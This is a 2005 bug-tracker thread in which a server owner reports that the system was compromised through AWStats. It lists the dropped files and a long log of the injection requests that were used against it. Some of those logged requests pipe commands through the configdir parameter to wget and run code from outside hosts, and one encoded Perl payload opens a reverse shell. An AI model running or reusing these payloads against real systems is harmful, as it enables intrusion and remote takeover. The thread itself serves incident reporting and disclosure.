Menu

#437 AWSTATS exploit

closed
Laurent Destailleur (Eldy)
Other (206)
5
2015-02-17
2005-05-09
Ryan
No

I just found my box hacked thanks to AWSTATS (Revision: 1.751)
running on my system.

To help you figure out which commands actually worked, here's a list
of files I found on the system:
/tmp:
./port.tar
./port
./port/65500
./port/4000
./port/14568
./port/35651
./.dt
./.dt/bind.tgz

/var/tmp:
./.p
./.p/help
./.p/help/ADDLOG.TXT
./.p/help/DELLOG.TXT
./.p/help/LISTLOGS.TXT
./.p/help/PLAYTRAFFICLOG.TXT
./.p/help/PROXY.TXT
./.p/help/SETLEAVEMSG.TXT
./.p/help/SETAWAYNICK.TXT
./.p/help/ADDAUTOOP.TXT
./.p/help/DELAUTOOP.TXT
./.p/help/LISTAUTOOPS.TXT
./.p/help/ACOLLIDE.TXT
./.p/help/ADDALLOW.TXT
./.p/help/ADDASK.TXT
./.p/help/ADDBAN.TXT
./.p/help/ADDDCC.TXT
./.p/help/ADDNETWORK.TXT
./.p/help/ADDOP.TXT
./.p/help/ADDSERVER.TXT
./.p/help/ADDUSER.TXT
./.p/help/BCONNECT.TXT
./.p/help/BHELP.TXT
./.p/help/BKILL.TXT
./.p/help/BQUIT.TXT
./.p/help/BWHO.TXT
./.p/help/DELALLOW.TXT
./.p/help/DELASK.TXT
./.p/help/DELBAN.TXT
./.p/help/DELDCC.TXT
./.p/help/DELENCRYPT.TXT
./.p/help/DELLINK.TXT
./.p/help/DELNETWORK.TXT
./.p/help/DELOP.TXT
./.p/help/DELSERVER.TXT
./.p/help/DELTRANSLATE.TXT
./.p/help/DELUSER.TXT
./.p/help/ENCRYPT.TXT
./.p/help/ERASEMAINLOG.TXT
./.p/help/ERASEPRIVATELOG.TXT
./.p/help/ERASETRAFFICLOG.TXT
./.p/help/JUMP.TXT
./.p/help/LINKFROM.TXT
./.p/help/LINKTO.TXT
./.p/help/LISTALLOW.TXT
./.p/help/LISTASK.TXT
./.p/help/LISTBANS.TXT
./.p/help/LISTDCC.TXT
./.p/help/LISTENCRYPT.TXT
./.p/help/LISTLINKS.TXT
./.p/help/LISTOPS.TXT
./.p/help/LISTSERVERS.TXT
./.p/help/MADMIN.TXT
./.p/help/NAMEBOUNCER.TXT
./.p/help/PASSWORD.TXT
./.p/help/PLAYMAINLOG.TXT
./.p/help/PLAYPRIVATELOG.TXT
./.p/help/RELAYLINK.TXT
./.p/help/SETAWAY.TXT
./.p/help/SETUSERNAME.TXT
./.p/help/SOCKSTAT.TXT
./.p/help/TRANSLATE.TXT
./.p/help/UNADMIN.TXT
./.p/help/VHOST.TXT
./.p/help/SETLINKKEY.TXT
./.p/help/SETUSERKEY.TXT
./.p/help/RELINK.TXT
./.p/help/DCCCHAT.TXT
./.p/help/DCCANSWER.TXT
./.p/help/DCCSEND.TXT
./.p/help/DCCGET.TXT
./.p/help/DCCCANCEL.TXT
./.p/help/BREHASH.TXT
./.p/help/SRELOAD.TXT
./.p/help/LISTTASKS.TXT
./.p/help/SWITCHNET.TXT
./.p/help/DCCENABLE.TXT
./.p/help/AIDLE.TXT
./.p/help/AUTOREJOIN.TXT
./.p/help/LEAVEQUIT.TXT
./.p/log
./.p/log/INFO
./.p/log/psybnc.log
./.p/log/USER1.TRL
./.p/log/USER2.TRL
./.p/log/psybnc.log.old
./.p/log/USER3.TRL
./.p/motd
./.p/motd/INFO
./.p/motd/USER1.MOTD
./.p/motd/USER1.MOTD.old
./.p/motd/USER2.MOTD
./.p/motd/USER2.MOTD.old
./.p/motd/USER3.MOTD
./.p/motd/USER3.MOTD.old
./.p/psybnc.conf
./.p/psybncchk
./.p/scripts
./.p/scripts/INFO
./.p/scripts/example
./.p/scripts/example/DEFAULT.SCRIPT
./.p/httpd
./.p/psybnc.pid

Here is the complete list of URLs they ran to exploit my system.

---- snip -----
"GET //cgi-bin/awstats/awstats.pl?configdir=|%20id%20| HTTP/1.1"
"GET //cgi-bin/awstats.pl?configdir=|%20id%20| HTTP/1.1"
"GET //cgi/awstats.pl?configdir=|%20id%20| HTTP/1.1"
"GET //cp/awstats/awstats.pl?configdir=|%20id%20| HTTP/1.1"
"GET //awstats/awstats.pl?configdir=|%20id%20| HTTP/1.1"
"GET //stat-cgi/awstats.pl?configdir=|%20id%20| HTTP/1.1"
"GET //awstats/perl/awstats.pl?configdir=|%20id%20| HTTP/1.1"
"GET /cgi-bin/awstats.pl HTTP/1.1"
"GET /awstats/awstats.pl HTTP/1.1"
"GET //cgi-bin/awstats/awstats.pl?configdir=|%20id%20| HTTP/1.1"
"GET //cgi-bin/awstats/awstats.pl?configdir=|%20id%20| HTTP/1.1"
"GET //cgi-bin/awstats.pl?configdir=|%20id%20| HTTP/1.1"
"GET //cgi/awstats.pl?configdir=|%20id%20| HTTP/1.1"
"GET //cgi-bin/awstats/awstats.pl?configdir=|%20id%20| HTTP/1.1"
"GET //cgi-bin/awstats.pl?configdir=|%20id%20| HTTP/1.1"
"GET //cgi/awstats.pl?configdir=|%20id%20| HTTP/1.1"
"GET //cgi-bin/awstats/awstats.pl?configdir=|%20id%20| HTTP/1.1"
"GET //cgi-bin/awstats.pl?configdir=|%20id%20| HTTP/1.1"
"GET //cgi/awstats.pl?configdir=|%20id%20| HTTP/1.1"
"GET //cgi-bin/awstats/awstats.pl?configdir=|%20id%20| HTTP/1.1"
"GET //cgi-bin/awstats.pl?configdir=|%20id%20| HTTP/1.1"
"GET //cgi/awstats.pl?configdir=|%20id%20| HTTP/1.1"
"GET //cgi-bin/awstats/awstats.pl?configdir=|%20id%20| HTTP/1.1"
"GET //cgi-bin/awstats.pl?configdir=|%20id%20| HTTP/1.1"
"GET //cgi/awstats.pl?configdir=|%20id%20| HTTP/1.1"
"GET //cp/awstats/awstats.pl?configdir=|%20id%20| HTTP/1.1"
"GET //stat-cgi/awstats.pl?configdir=|%20id%20| HTTP/1.1"
"GET //awstats/awstats.pl?configdir=|%20id%20| HTTP/1.1"
"GET //awstats/perl/awstats.pl?configdir=|%20id%20| HTTP/1.1"
"GET //cgi-bin/awstats/awstats.pl?configdir=|%20id%20| HTTP/1.1"
"GET //cgi-bin/awstats.pl?configdir=|%20id%20| HTTP/1.1"
"GET //cgi/awstats.pl?configdir=|%20id%20| HTTP/1.1"
"GET //cgi-bin/awstats/awstats.pl?configdir=|%20id%20| HTTP/1.1"
"GET //cgi-bin/awstats.pl?configdir=|%20id%20| HTTP/1.1"
"GET //cgi/awstats.pl?configdir=|%20id%20| HTTP/1.1"
"GET /\r/awstats.pl?configdir=|/cgi-bin/| HTTP/1.1"
"GET /\r/awstats.pl?configdir=|/awstats/| HTTP/1.1"
"GET /\r/awstats.pl?configdir=|/cgi-bin/| HTTP/1.1"
"GET /\r/awstats.pl?configdir=|/awstats/| HTTP/1.1"
"GET /\r/awstats.pl?configdir=|/awstats| HTTP/1.1"
"GET /\r/awstats.pl?configdir=|awstats| HTTP/1.1"
"GET /\r/awstats.pl?configdir=|cgi-bin| HTTP/1.1"
"GET /\r/awstats.pl?configdir=|awstats| HTTP/1.1"
"GET /cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;
wget%20vpasp.go.ro/sess_3539283e27d73cae29fe2b80f9293f57;
perl%20sess_3539283e27d73cae29fe2b80f9293f57;echo%20;echo|
HTTP/1.1"
"GET /awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;
wget%20vpasp.go.ro/sess_3539283e27d73cae29fe2b80f9293f57;
perl%20sess_3539283e27d73cae29fe2b80f9293f57;echo%20;echo|
HTTP/1.1"
"GET //cgi-bin/awstats/awstats.pl?configdir=|%20id%20| HTTP/1.1"
"GET //cgi-bin/awstats.pl?configdir=|%20id%20| HTTP/1.1"
"GET //cgi/awstats.pl?configdir=|%20id%20| HTTP/1.1"
"GET //cp/awstats/awstats.pl?configdir=|%20id%20| HTTP/1.1"
"GET //stat-cgi/awstats.pl?configdir=|%20id%20| HTTP/1.1"
"GET //awstats/perl/awstats.pl?configdir=|%20id%20| HTTP/1.1"
"GET //awstats/awstats.pl?configdir=|%20id%20| HTTP/1.1"
"GET //awstats/awstats.pl?configdir=|%20id%20| HTTP/1.1"
"GET //cgi-bin/awstats/awstats.pl?configdir=|%20id%20| HTTP/1.1"
"GET //cgi-bin/awstats.pl?configdir=|%20id%20| HTTP/1.1"
"GET //cgi/awstats.pl?configdir=|%20id%20| HTTP/1.1"
"GET //awstats/awstats.pl?configdir=|%20id%20| HTTP/1.1"
"GET //cgi-bin/awstats/awstats.pl HTTP/1.1"
"GET //cgi-bin/awstats.pl HTTP/1.1"
"GET //cgi/awstats.pl HTTP/1.1"
"GET //stat-cgi/awstats.pl HTTP/1.1"
"GET //cp/awstats/awstats.pl HTTP/1.1"
"GET //awstats/perl/awstats.pl HTTP/1.1"
"GET //stat-cgi/awstats.pl HTTP/1.1"
"GET //awstats/awstats.pl HTTP/1.1"
"GET //cgi-bin/awstats/awstats.pl?configdir=|%20id%20| HTTP/1.1"
"GET //cgi-bin/awstats.pl?configdir=|%20id%20| HTTP/1.1"
"GET //cgi/awstats.pl?configdir=|%20id%20| HTTP/1.1"
"GET /cgi-bin/awstats.pl?configdir=|ls| HTTP/1.1"
"GET /awstats/awstats.pl?configdir=|ls| HTTP/1.1"
"GET /awstats/?configdir=|ls| HTTP/1.1"
"GET //cgi-bin/awstats/awstats.pl?update=1&logfile=|%20id%20|
HTTP/1.1"
"GET //cgi-bin/awstats/awstats.pl?pluginmode=:
system(\"%20id%20\") HTTP/1.1"
"GET //cgi-bin/awstats.pl?update=1&logfile=|%20id%20| HTTP/1.1"
"GET //cgi-bin/awstats.pl?pluginmode=:system(\"%20id%20\")
HTTP/1.1"
"GET //cgi/awstats.pl?update=1&logfile=|%20id%20| HTTP/1.1"
"GET //cgi/awstats.pl?pluginmode=:system(\"%20id%20\") HTTP/
1.1"
"GET //cgi-bin/awstats/awstats.pl HTTP/1.1"
"GET //cgi-bin/awstats.pl HTTP/1.1"
"GET //cgi/awstats.pl HTTP/1.1"
"GET //stat-cgi/awstats.pl HTTP/1.1"
"GET //cp/awstats/awstats.pl HTTP/1.1"
"GET //awstats/perl/awstats.pl HTTP/1.1"
"GET //stat-cgi/awstats.pl HTTP/1.1"
"GET //awstats/awstats.pl HTTP/1.1"
"GET /cgi-bin/awstats.pl HTTP/1.0"
"GET /cgi-bin/awstats.pl HTTP/1.1"
"GET /awstats/awstats.pl HTTP/1.1"
"GET /awstats/awstats.pl?configdir=|perl%20-
e%20%22print%20%5C%22%5Cx23%5Cx21%5Cx2f%5Cx75%5Cx
73%5Cx72%5Cx2f%5Cx62%5Cx69%5Cx6e%5Cx2f%5Cx70%5Cx6
5%5Cx72%5Cx6c%5Cx0a%5Cx75%5Cx73%5Cx65%5Cx20%5Cx5
3%5Cx6f%5Cx63%5Cx6b%5Cx65%5Cx74%5Cx3b%5Cx20%5Cx75
%5Cx73%5Cx65%5Cx20%5Cx49%5Cx4f%5Cx3a%5Cx3a%5Cx48
%5Cx61%5Cx6e%5Cx64%5Cx6c%5Cx65%5Cx3b%5Cx20%5Cx75
%5Cx73%5Cx65%5Cx20%5Cx50%5Cx4f%5Cx53%5Cx49%5Cx58
%5Cx3b%5Cx20%5Cx24%5Cx70%5Cx72%5Cx6f%5Cx74%5Cx6f%
5Cx20%5Cx3d%5Cx20%5Cx67%5Cx65%5Cx74%5Cx70%5Cx72%
5Cx6f%5Cx74%5Cx6f%5Cx62%5Cx79%5Cx6e%5Cx61%5Cx6d%5
Cx65%5Cx28%5Cx27%5Cx74%5Cx63%5Cx70%5Cx27%5Cx29%5
Cx3b%5C%22%22%20%3E/var/tmp/.vetx.95| HTTP/1.1"
"GET /awstats/awstats.pl?configdir=|perl%20-
e%20%22print%20%5C%22%5Cx20%5Cx73%5Cx6f%5Cx63%5Cx
6b%5Cx65%5Cx74%5Cx28%5Cx53%5Cx6f%5Cx63%5Cx6b%5Cx6
5%5Cx74%5Cx5f%5Cx48%5Cx61%5Cx6e%5Cx64%5Cx6c%5Cx65
%5Cx2c%5Cx20%5Cx41%5Cx46%5Cx5f%5Cx49%5Cx4e%5Cx45
%5Cx54%5Cx2c%5Cx20%5Cx53%5Cx4f%5Cx43%5Cx4b%5Cx5f%
5Cx53%5Cx54%5Cx52%5Cx45%5Cx41%5Cx4d%5Cx2c%5Cx20%
5Cx24%5Cx70%5Cx72%5Cx6f%5Cx74%5Cx6f%5Cx29%5Cx3b%5
Cx20%5Cx24%5Cx73%5Cx69%5Cx6e%5Cx20%5Cx3d%5Cx20%5
Cx73%5Cx6f%5Cx63%5Cx6b%5Cx61%5Cx64%5Cx64%5Cx72%5C
x5f%5Cx69%5Cx6e%5Cx28%5Cx33%5Cx31%5Cx30%5Cx33%5Cx
32%5Cx2c%5Cx69%5Cx6e%5Cx65%5Cx74%5Cx5f%5Cx61%5Cx7
4%5C%22%22%20%3E%3E/var/tmp/.vetx.95| HTTP/1.1"
"GET /awstats/awstats.pl?configdir=|perl%20-
e%20%22print%20%5C%22%5Cx6f%5Cx6e%5Cx28%5Cx22%5Cx
32%5Cx31%5Cx38%5Cx2e%5Cx31%5Cx38%5Cx39%5Cx2e%5Cx
32%5Cx31%5Cx36%5Cx2e%5Cx31%5Cx38%5Cx31%5Cx22%5Cx
29%5Cx29%5Cx3b%5Cx20%5Cx63%5Cx6f%5Cx6e%5Cx6e%5Cx6
5%5Cx63%5Cx74%5Cx28%5Cx53%5Cx6f%5Cx63%5Cx6b%5Cx65
%5Cx74%5Cx5f%5Cx48%5Cx61%5Cx6e%5Cx64%5Cx6c%5Cx65
%5Cx2c%5Cx24%5Cx73%5Cx69%5Cx6e%5Cx29%5Cx3b%5Cx20
%5Cx64%5Cx75%5Cx70%5Cx32%5Cx28%5Cx53%5Cx6f%5Cx63
%5Cx6b%5Cx65%5Cx74%5Cx5f%5Cx48%5Cx61%5Cx6e%5Cx64
%5Cx6c%5Cx65%5Cx2d%5Cx3e%5Cx66%5Cx69%5Cx6c%5Cx65
%5Cx6e%5Cx6f%5Cx2c%5Cx20%5Cx30%5Cx29%5Cx3b%5Cx20
%5Cx64%5C%22%22%20%3E%3E/var/tmp/.vetx.95| HTTP/1.1"
"GET /awstats/awstats.pl?configdir=|perl%20-
e%20%22print%20%5C%22%5Cx75%5Cx70%5Cx32%5Cx28%5Cx
53%5Cx6f%5Cx63%5Cx6b%5Cx65%5Cx74%5Cx5f%5Cx48%5Cx6
1%5Cx6e%5Cx64%5Cx6c%5Cx65%5Cx2d%5Cx3e%5Cx66%5Cx6
9%5Cx6c%5Cx65%5Cx6e%5Cx6f%5Cx2c%5Cx20%5Cx31%5Cx29
%5Cx3b%5Cx20%5Cx64%5Cx75%5Cx70%5Cx32%5Cx28%5Cx53
%5Cx6f%5Cx63%5Cx6b%5Cx65%5Cx74%5Cx5f%5Cx48%5Cx61%
5Cx6e%5Cx64%5Cx6c%5Cx65%5Cx2d%5Cx3e%5Cx66%5Cx69%
5Cx6c%5Cx65%5Cx6e%5Cx6f%5Cx2c%5Cx20%5Cx32%5Cx29%5
Cx3b%5Cx20%5Cx65%5Cx78%5Cx65%5Cx63%5Cx20%5Cx7b%5
Cx20%5Cx22%5Cx2f%5Cx62%5Cx69%5Cx6e%5Cx2f%5Cx73%5C
x68%5Cx22%5Cx20%5Cx7d%5Cx20%5Cx22%5Cx22%5Cx3b%5C
x0a%5C%22%22%20%3E%3E/var/tmp/.vetx.95| HTTP/1.1"
"GET /awstats/awstats.pl?configdir=|chmod%20755%20/var/tmp/
.vetx.95| HTTP/1.1"
"GET /awstats/awstats.pl?configdir=|exec%20/var/tmp/.vetx.95|
HTTP/1.1"
"GET /awstats/awstats.pl?configdir=|rm%20%2Df%20/var/tmp/
.vetx.95| HTTP/1.1"
"GET //cgi-bin/awstats/awstats.pl HTTP/1.1"
"GET //cgi-bin/awstats.pl HTTP/1.1"
"GET //cgi/awstats.pl HTTP/1.1"
"GET //awstats/awstats.pl HTTP/1.1"
"GET //cgi-bin/stats/awstats.pl HTTP/1.1"
"GET //stats/awstats.pl HTTP/1.1"
"GET //awstats.pl HTTP/1.1"
"GET //cgi/stats/awstats.pl HTTP/1.1"
"GET //awstats/awstats.pl?
configdir=%7cecho%20%3becho%20b_exp%3bw%3becho%20e_ex
p%3b%2500 HTTP/1.1"
"GET //awstats/awstats.pl?
configdir=%7cecho%20%3becho%20b_exp%3buname%20%2da%3
becho%20e_exp%3b%2500 HTTP/1.1"
"GET //cgi-bin/awstats/awstats.pl?configdir=|%20id%20| HTTP/1.1"
"GET //cgi-bin/awstats.pl?configdir=|%20id%20| HTTP/1.1"
"GET //cgi/awstats.pl?configdir=|%20id%20| HTTP/1.1"
"GET //cgi-bin/awstats/awstats.pl HTTP/1.1"
"GET //cgi-bin/awstats.pl HTTP/1.1"
"GET //cgi/awstats.pl HTTP/1.1"
"GET //awstats/awstats.pl HTTP/1.1"
"GET //cgi-bin/stats/awstats.pl HTTP/1.1"
"GET //stats/awstats.pl HTTP/1.1"
"GET //awstats.pl HTTP/1.1"
"GET //cgi/stats/awstats.pl HTTP/1.1"
"GET //awstats/awstats.pl?
configdir=%7cecho%20%3becho%20b_exp%3bw%3becho%20e_ex
p%3b%2500 HTTP/1.1"
"GET //awstats/awstats.pl?
configdir=%7cecho%20%3becho%20b_exp%3buname%20%2da%3
becho%20e_exp%3b%2500 HTTP/1.1"
"GET //awstats/awstats.pl?
configdir=%7cecho%20%3becho%20b_exp%3bcd%20%2ftmp%3bw
get%20madnuker%2ego%2ero%2fport%2etgz%3btar%20xvzf%20p
ort%2etgz%3bcd%20port%3bchmod%20%2bx%2014568%3b%2e%
2f14568%3becho%20e_exp%3b%2500 HTTP/1.1"
"GET /cgi-bin/awstats.pl HTTP/1.0"
"GET //cgi-bin/awstats/awstats.pl HTTP/1.1"
"GET //cgi-bin/awstats.pl HTTP/1.1"
"GET //cgi/awstats.pl HTTP/1.1"
"GET //awstats/awstats.pl HTTP/1.1"
"GET //cgi-bin/stats/awstats.pl HTTP/1.1"
"GET //stats/awstats.pl HTTP/1.1"
"GET //awstats.pl HTTP/1.1"
"GET //cgi/stats/awstats.pl HTTP/1.1"
"GET //cgi-bin/awstats/awstats.pl HTTP/1.1"
"GET //cgi-bin/awstats.pl HTTP/1.1"
"GET //cgi/awstats.pl HTTP/1.1"
"GET //awstats/awstats.pl HTTP/1.1"
"GET //cgi-bin/stats/awstats.pl HTTP/1.1"
"GET //stats/awstats.pl HTTP/1.1"
"GET //awstats.pl HTTP/1.1"
"GET //cgi/stats/awstats.pl HTTP/1.1"
"GET //awstats/awstats.pl?
configdir=%7cecho%20%3becho%20b_exp%3buname%20%2da%3
becho%20e_exp%3b%2500 HTTP/1.1"
"GET /cgi-bin/awstats.pl?configdir=|echo%20;echo%20;
cat%20awstats.pl;echo%20;echo| HTTP/1.1"
"GET /awstats/awstats.pl?configdir=|echo%20;echo%20;
cat%20awstats.pl;echo%20;echo| HTTP/1.1"
"GET //cgi-bin/awstats/awstats.pl HTTP/1.1"
"GET //cgi-bin/awstats.pl HTTP/1.1"
"GET //cgi/awstats.pl HTTP/1.1"
"GET //stat-cgi/awstats.pl HTTP/1.1"
"GET //cp/awstats/awstats.pl HTTP/1.1"
"GET //awstats/perl/awstats.pl HTTP/1.1"
"GET //stat-cgi/awstats.pl HTTP/1.1"
"GET //awstats/awstats.pl HTTP/1.1"
"GET /awstats/awstats.pl?configdir=|echo;echo+DTORS_START;id;
echo+DTORS_STOP;echo| HTTP/1.0"
"GET /awstats/awstats.pl?configdir=|echo;echo+DTORS_START;w;
echo+DTORS_STOP;echo| HTTP/1.0"
"GET /awstats/awstats.pl?configdir=|echo;echo+DTORS_START;
uname%20-a;echo+DTORS_STOP;echo| HTTP/1.0"
"GET /awstats/awstats.pl?configdir=|echo;echo+DTORS_START;
cd%20/tmp;mkdir%20.dt;cd%20.dt;wget%20diez.go.ro/bind.tgz;
tar%20xzvf%20bind.tgz;ls;chmod%20+x%20bind;
mv%20bind%20imapd;PATH=.:$PATH;imapd%20%20;
echo+DTORS_STOP;echo| HTTP/1.0"
"GET //cgi-bin/awstats/awstats.pl \"w;wget\" HTTP/1.1"
"GET //cgi-bin/awstats.pl \"w;wget\" HTTP/1.1"
"GET //cgi/awstats.pl \"w;wget\" HTTP/1.1"
"GET //cgi/awstats/awstats.pl \"w;wget\" HTTP/1.1"
"GET //awstats/awstats.pl \"w;wget\" HTTP/1.1"
"GET //awstats.pl \"w;wget\" HTTP/1.1"
"GET //stats/awstats.pl HTTP/1.1"
"GET //cgi-bin/stats/awstats.pl HTTP/1.1"
"GET //cgi/stats/awstats.pl HTTP/1.1"
"GET //awstats/awstats.pl?
configdir=%7cecho%20%3becho%20b_exp%3bw%3bwget%3becho
%20e_exp%3b%2500 HTTP/1.1"
"GET //awstats/awstats.pl?
configdir=%7cecho%20%3becho%20b_exp%3bcd%20%2fvar%2ftm
p%3bwget%20www%2elocalhost%2ehome%2ero%2fsunpsy%2etar
%3bls%20%2da%3becho%20e_exp%3b%2500 HTTP/1.1"
"GET //awstats/awstats.pl?
configdir=%7cecho%20%3becho%20b_exp%3bcd%20%2fvar%2ftm
p%3btar%20xvf%20sunpsy%2etar%3becho%20e_exp%3b%2500
HTTP/1.1"
"GET //awstats/awstats.pl?
configdir=%7cecho%20%3becho%20b_exp%3bcd%20%2fvar%2ftm
p%3bls%20%2da%3becho%20e_exp%3b%2500 HTTP/1.1"
"GET //awstats/awstats.pl?
configdir=%7cecho%20%3becho%20b_exp%3bcd%20%2fvar%2ftm
p%3brm%20%2drf%20sunpsy%2etar%3bmv%20psybnc%20%2ep
%3becho%20e_exp%3b%2500 HTTP/1.1"
"GET //awstats/awstats.pl?
configdir=%7cecho%20%3becho%20b_exp%3bcd%20%2fvar%2ftm
p%3bls%20%2da%3becho%20e_exp%3b%2500 HTTP/1.1"
"GET //awstats/awstats.pl?
configdir=%7cecho%20%3becho%20b_exp%3bcd%20%2fvar%2ftm
p%2f%2ep%3bls%20%2da%20%3becho%20e_exp%3b%2500
HTTP/1.1"
"GET //awstats/awstats.pl?
configdir=%7cecho%20%3becho%20b_exp%3bcd%20%2fvar%2ftm
p%2f%2ep%3bmv%20pine%20httpd%3bexport%20PATH%3d%3a%
3a%2fusr%2flocal%2fsbin%3a%2fusr%2fsbin%3a%2fsbin%3a%2fu
sr%2fbin%3a%2fbin%3a%2flib%2fsecurity%2f%2econfig%2fbin%3a
%2fusr%2fX11R6%2fbin%3bhttpd%3becho%20e_exp%3b%2500
HTTP/1.1"
"GET //awstats/awstats.pl?
configdir=%7cecho%20%3becho%20b_exp%3bcd%20%2fvar%2ftm
p%2f%2ep%3b%2e%2fhttpd%3becho%20e_exp%3b%2500 HTTP/
1.1"
"GET //cgi-bin/awstats/awstats.pl HTTP/1.1"
"GET //cgi-bin/awstats.pl HTTP/1.1"
"GET //cgi/awstats.pl HTTP/1.1"
"GET //awstats/awstats.pl HTTP/1.1"
"GET //cgi-bin/stats/awstats.pl HTTP/1.1"
"GET //stats/awstats.pl HTTP/1.1"
"GET //awstats.pl HTTP/1.1"
"GET //cgi/stats/awstats.pl HTTP/1.1"

Discussion

  • Ryan McKay

    Ryan McKay - 2005-05-09

    Logged In: YES
    user_id=927052

    We just got hit by a very similar attack, using the
    configdir parameter to run a series of commands.

     

  • Ryan McKay

    Ryan McKay - 2005-05-09

    Logged In: YES
    user_id=927052

    Sorry following up on that previous comment, our version is
    ancient, 1.605, its probably fixed by now.

     

  • Ryan

    Ryan - 2005-05-10

    Logged In: YES
    user_id=573272

    ryanmckay: The version I was running was version 1.751. So it could still
    exist... I'm not going to use this program any more, but it would be good
    for people to be notified of this issue. It looks like a worm is worming the
    internet ....

     

  • bin-doph

    bin-doph - 2005-05-10

    Logged In: YES
    user_id=1072572

    Hi,

    we have been attacked by a similar attack. Restricting the
    access to the script to known ip-adresses solves this issue
    for us, but it should be fixed anyway...

    cheers

     

  • DataBoy

    DataBoy - 2005-05-17

    Logged In: YES
    user_id=1270046

    We had a server attacked and toasted due to AWSTATs too.

    So much for the highly secure nature of open source.

     

  • Anonymous

    Anonymous - 2005-05-27

    Logged In: YES
    user_id=937105

    I just got hit as well.

    [26/May/2005:19:04:39 -0600] GET
    /awstats/awstats.pl?configdir=|echo ;cd /tmp;wget
    www.fermedorlou.be/sess_3539283e27d73cae29fe2b80f9293f60;perl
    sess_3539283e27d73cae29fe2b80f9293f60;echo ;echo|

    I'm running 6.2 (build 1.771).

    Is this exploit fixed in the lastest version?

     

  • Laurent Destailleur (Eldy)

    Laurent Destailleur (Eldy) - 2005-06-10

    Logged In: YES
    user_id=96898

    AWStats security hole was fixed with 6.4 release.

     

  • Robert Kolatzek

    Robert Kolatzek - 2005-10-24

    Logged In: YES
    user_id=554119

    New Bot
    "User-Agent: DataCha0s/2.0"
    searchs for
    "GET /cgi-bin/awstats.pl?configdir=|echo;echo;id;
    %00"

    secure youre server with apache-mod_secure

     

Log in to post a comment.